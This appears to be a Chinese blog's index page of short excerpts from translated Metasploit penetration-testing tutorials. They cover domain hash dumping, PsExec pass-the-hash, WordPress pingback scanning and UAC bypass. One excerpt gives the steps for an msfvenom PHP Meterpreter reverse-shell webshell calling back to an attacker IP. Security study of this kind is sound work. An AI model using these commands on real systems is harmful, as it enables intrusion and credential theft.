metasploit
iteye_16188
这个作者很懒,什么都没留下…
展开
-
使用ntds_hashextractDumpntds密码
原文:https://www.pentestgeek.com/2012/11/16/dumping-domain-password-hashes-using-metasploit-ntds_hashextract-rb/ntds_hashextract.rb是一个可以从NTDS.dit 导出的时间表中快速提取密码hash的工具。第一步:安装Libesedb包[color=blue]wg...原创 2014-10-03 00:55:14 · 212 阅读 · 0 评论 -
Metasploit PSExec Pass The Hash
原文:http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hashpsexec被渗透测试者用来获得一个已知口令的系统访问权。作为一个渗透测试者,当我们通过漏洞成功获取一个系统访问权后,使用meterpreter来获得密码,或者通过fgdump, pwdump, cachedump和彩虹表来配合破解这些ha...原创 2014-10-03 01:18:55 · 419 阅读 · 0 评论 -
[译]WordPress Pingback端口扫描
原文地址:https://www.pentestgeek.com/2013/01/03/wordpress-pingback-portscanner-metasploit-module/WordPress3.5版本中XML-RPC默认是开启的。WordPress默认没有可以关闭该选项的方法。必须安装插件或直接编辑代码来关闭该设置。如下所示,可以确认WordPress的XML-RPC是否运行...原创 2014-10-14 00:34:49 · 224 阅读 · 0 评论 -
[译]WordPress Pingback端口扫描(二)
原文地址:https://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/使用metasploit的wordpress_pingback_access模块来进行扫描该模块只需RHOST和一个可选的目标URI来扫描大量的web服务,以检查他们是否有漏洞。一个HEAD请求将会返回X...原创 2014-10-15 00:44:51 · 277 阅读 · 0 评论 -
php Meterpreter Webshell
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php2. 上传a.php到web服务器3. 启动msfconsole4. use multi/handler5. set LHOST Attacker's_IP6. set LPORT 4437. set ...原创 2014-11-17 02:22:17 · 389 阅读 · 1 评论 -
[译]PsExec绕过UAC
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass[/url][color=red][b]注意:本例可以通过metasploit中exploit/windows/local/current_user_psexec模块解决。[/b][/color][b]场景:[/b]...原创 2014-11-25 01:15:42 · 403 阅读 · 0 评论 -
Metasploit PsExec模块
参考:https://rapid7-community.hosted.jivesoftware.com/community/metasploit/blog/authors/thelightcosinehttp://www.rapid7.com/db/modules/exploit/windows/smb/psexec_pshexploit/windows/smb/psexec_ps...原创 2014-11-25 01:59:48 · 376 阅读 · 0 评论 -
[转]badsamba
原文地址:[url]http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html[/url]本文中心思想是:前提条件:1. window启动时以Local System account权限运行启动脚本[quote]“St...原创 2015-03-20 00:55:25 · 88 阅读 · 0 评论 -
[转]Deep Dive Into Stageless Meterpreter Payloads
[url]https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads[/url]原创 2015-03-31 01:13:37 · 169 阅读 · 0 评论